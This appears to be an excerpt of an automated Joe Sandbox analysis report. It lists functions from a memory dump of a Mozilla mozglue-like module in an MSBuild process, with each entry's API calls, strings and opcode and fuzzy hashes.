                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31b5bb65ffc16f04850917ba0ff4b34fb32aa51f6066bf5b90757c748c938cc8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F311B6B19052156BD720AFBA8D44B6BBFF8EF4A354F14482DF84897301F771895087E2
                                                                                                                                                                                                                      Function 6C8C0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C883DEF), ref: 6C8C0D71
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C883DEF), ref: 6C8C0D84
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C883DEF), ref: 6C8C0DAF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                      • API String ID: 1852963964-2186867486
                                                                                                                                                                                                                      • Opcode ID: 9f5a42b71adffdd2a39ca31071ca8c7ba0d60cd810e5ad6287a3e328b89b5d81
                                                                                                                                                                                                                      • Instruction ID: e12f8aa54b6e6b14876704f1fe936f3a6130748236a6ae47a057b57a81747292
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f5a42b71adffdd2a39ca31071ca8c7ba0d60cd810e5ad6287a3e328b89b5d81
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF0E9B138479823E730236A4D0AB5A266DA7C2FA6F30463DF714DFDC0DF50E4005AA6
                                                                                                                                                                                                                      Function 6C8E5850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000000FF), ref: 6C8E586C
                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 6C8E5878
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C8E5898
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C8E58C9
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8E58D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CloseHandleObjectSingleWait
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1910681409-0
                                                                                                                                                                                                                      • Opcode ID: 0f4ca002c3fc19cc9c51359bab28836e9b05a8b368f59772636e8b788534fe9c
                                                                                                                                                                                                                      • Instruction ID: f6d09b15c31339d9a646c458e0e62312ecf8caacc8e04ecbcad6daa306a26c90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f4ca002c3fc19cc9c51359bab28836e9b05a8b368f59772636e8b788534fe9c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D018B7170C315DBCF00DF1A9908A227BB9EB8732C734417EE51AC2250D731DA188F89
                                                                                                                                                                                                                      Function 6C8D7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C8D75C4,?), ref: 6C8D762B
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C8D74D7,6C8E15FC,?,?,?), ref: 6C8D7644
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D765A
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C8D74D7,6C8E15FC,?,?,?), ref: 6C8D7663
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C8D74D7,6C8E15FC,?,?,?), ref: 6C8D7677
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 418114769-0
                                                                                                                                                                                                                      • Opcode ID: 882d28a4cf3967336ee03b3d34e9141d542f3cb7caacd471a8814c86beb86a7b
                                                                                                                                                                                                                      • Instruction ID: c4d35bf0ca669770ebd81f64068dad0757e607f528c6587fa08173fe885acefe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 882d28a4cf3967336ee03b3d34e9141d542f3cb7caacd471a8814c86beb86a7b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EF0C271F14746ABD7008F21C888676B778FFEA259F21431EF90543602E7B1A5D08BD0
                                                                                                                                                                                                                      Function 6C8E1700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8E1800
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                        • Part of subcall function 6C884290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C8C3EBD,6C8C3EBD,00000000), ref: 6C8842A9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                                                                                                                                                      • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                                                                                                                                                      • API String ID: 46770647-1733325692
                                                                                                                                                                                                                      • Opcode ID: eb9e92348692c8b598e401edd95c8b5c362ff60ac9cf2b74f3ed22b8a18b9572
                                                                                                                                                                                                                      • Instruction ID: 6096ef3100c16a2ce9b44dfa95794c96386f22421bb410693171a8534883fb8b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb9e92348692c8b598e401edd95c8b5c362ff60ac9cf2b74f3ed22b8a18b9572
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 067125B0A043069FD714DF28C550BAABBB1FF8A314F504A6DD8154BB41DB30EA98CBE1
                                                                                                                                                                                                                      Function 6C8EB0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C8EB0A6,6C8EB0A6,?,6C8EAF67,?,00000010,?,6C8EAF67,?,00000010,00000000,?,?,6C8EAB1F), ref: 6C8EB1F2
                                                                                                                                                                                                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C8EB0A6,6C8EB0A6,?,6C8EAF67,?,00000010,?,6C8EAF67,?,00000010,00000000,?), ref: 6C8EB1FF
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C8EB0A6,6C8EB0A6,?,6C8EAF67,?,00000010,?,6C8EAF67,?,00000010), ref: 6C8EB25F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$Xlength_error@std@@
                                                                                                                                                                                                                      • String ID: map/set<T> too long
                                                                                                                                                                                                                      • API String ID: 1922495194-1285458680
                                                                                                                                                                                                                      • Opcode ID: a81157b6b6cccf5e3508373cf343dd80a54b28fe54753d95aac1566875e19ea1
                                                                                                                                                                                                                      • Instruction ID: 8130be2951a6b7f65a0a38ee5a2c705539f386317d8447cff3b63b74e47ac3a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a81157b6b6cccf5e3508373cf343dd80a54b28fe54753d95aac1566875e19ea1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0616A746043458FD721CF59CA80AAABBF1FF4A328F18C9A9D8595BB52C331EC45CB91
                                                                                                                                                                                                                      Function 6C8AD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD4F2
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD50B
                                                                                                                                                                                                                        • Part of subcall function 6C88CFE0: EnterCriticalSection.KERNEL32(6C90E784), ref: 6C88CFF6
                                                                                                                                                                                                                        • Part of subcall function 6C88CFE0: LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C88D026
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD52E
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC), ref: 6C8AD690
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C8BD1C5), ref: 6C8AD751
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                      • String ID: MOZ_CRASH()
                                                                                                                                                                                                                      • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                      • Opcode ID: 275b257e5df415377845c47f438f0c61b7c00e30b54477ff5757a355d83a5e86
                                                                                                                                                                                                                      • Instruction ID: d7dab8f8f797ed76fe0698529932b0a81283d208926d5bf202b834e8bf9b199f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 275b257e5df415377845c47f438f0c61b7c00e30b54477ff5757a355d83a5e86
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C51BF71B087058FD368CF68C29465AB7E1EB89704F244E2ED9AAC7B85D770E805CB91
                                                                                                                                                                                                                      Function 6C8D4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                      • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                      • API String ID: 3732870572-2661126502
                                                                                                                                                                                                                      • Opcode ID: 629e1cecacf3ef77b7818c610f583319a50908ab4d7db077a200a36f32651ab7
                                                                                                                                                                                                                      • Instruction ID: ef5343476d5b490fc3455cbc89cf286a018e48b9cacd97dd313984ec595f701a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 629e1cecacf3ef77b7818c610f583319a50908ab4d7db077a200a36f32651ab7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65413471A047089BCB18DF78E95155EBBE5ABC5248F118A3EF856A7B41EB30A844C781
                                                                                                                                                                                                                      Function 6C8F9830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C8F985D
                                                                                                                                                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C8F987D
                                                                                                                                                                                                                      • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C8F98DE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C8F98D9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                                                                                                                                                      • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                                                                                                                                                      • API String ID: 1778083764-3290996778
                                                                                                                                                                                                                      • Opcode ID: b8e76c73fc8afcd66727c7723bf80a42f69e530c45cc5e0e3e82ba092d1b5bf3
                                                                                                                                                                                                                      • Instruction ID: 1476610af0ac154fd682e45b234f13d15d4018cff1c5e5202bc1638163b55e1c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8e76c73fc8afcd66727c7723bf80a42f69e530c45cc5e0e3e82ba092d1b5bf3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8310871B0020C6FDB24AF5DD9449EE77A9EF88318F50483DEA1AAB740DB319905CBE1
                                                                                                                                                                                                                      Function 6C8D46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C8D4721
                                                                                                                                                                                                                        • Part of subcall function 6C884410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C8C3EBD,00000017,?,00000000,?,6C8C3EBD,?,?,6C8842D2), ref: 6C884444
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                                                                                      • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                      • API String ID: 680628322-2661126502
                                                                                                                                                                                                                      • Opcode ID: 7448465410d454262499ecb2499a39f8e2ef4047fa88fd6b78ab7903ed9452af
                                                                                                                                                                                                                      • Instruction ID: c5a85073944554d8cbf60487e75aad19b9d6a35d1137d43852fcbf14ddd4ce33
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7448465410d454262499ecb2499a39f8e2ef4047fa88fd6b78ab7903ed9452af
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C313971F043085BCB18DF6CD99169EBBE6DBC9314F15493DE8059BB41E770A8448B50
                                                                                                                                                                                                                      Function 6C8DB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C884290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C8C3EBD,6C8C3EBD,00000000), ref: 6C8842A9
                                                                                                                                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C8DB127), ref: 6C8DB463
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8DB4C9
                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C8DB4E4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                      • String ID: pid:
                                                                                                                                                                                                                      • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                      • Opcode ID: 5f63fc1d23574f22ab9a7bc0ca14b0782fe0512617f9e41507d305142fce4bc2
                                                                                                                                                                                                                      • Instruction ID: dd2a03f7636d1b44fddd80f6d4ab4734a528b08a078d163bb3d16fc2a265a422
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f63fc1d23574f22ab9a7bc0ca14b0782fe0512617f9e41507d305142fce4bc2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9310231A01208DBDB20DFA9D980ABFB7B6BF49319F55092DD80167A40DB31F845CBA1
                                                                                                                                                                                                                      Function 6C88F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(shell32,?,6C8FD020), ref: 6C88F122
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C88F132
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                      • String ID: SHGetKnownFolderPath$shell32
                                                                                                                                                                                                                      • API String ID: 2574300362-1045111711
                                                                                                                                                                                                                      • Opcode ID: 37b02c6a0ad92cf056e6e703b62049b83c689e358155aea7874b855773c7f857
                                                                                                                                                                                                                      • Instruction ID: 6e0f43a8a2c9e585057636fe0958418e532d871b431039b4a1d7a9fd10975d9b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37b02c6a0ad92cf056e6e703b62049b83c689e358155aea7874b855773c7f857
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7015E75705219DFDB10DF69DD48A6B7BB8EF4A654B60052CE849E7700D730AA00CBA0
                                                                                                                                                                                                                      Function 6C8CE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CE577
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CE584
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CE5DE
                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C8CE8A6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                                                                      • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                                                                      • API String ID: 1483687287-53385798
                                                                                                                                                                                                                      • Opcode ID: 59158011cb53a2b174ca97bbce9aa703d2e39c54172b5554a97108cd6b912f9a
                                                                                                                                                                                                                      • Instruction ID: 498b427ceac598746b0ede57bd0e90b214a50c538c919bc501e74647c8466b3c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59158011cb53a2b174ca97bbce9aa703d2e39c54172b5554a97108cd6b912f9a
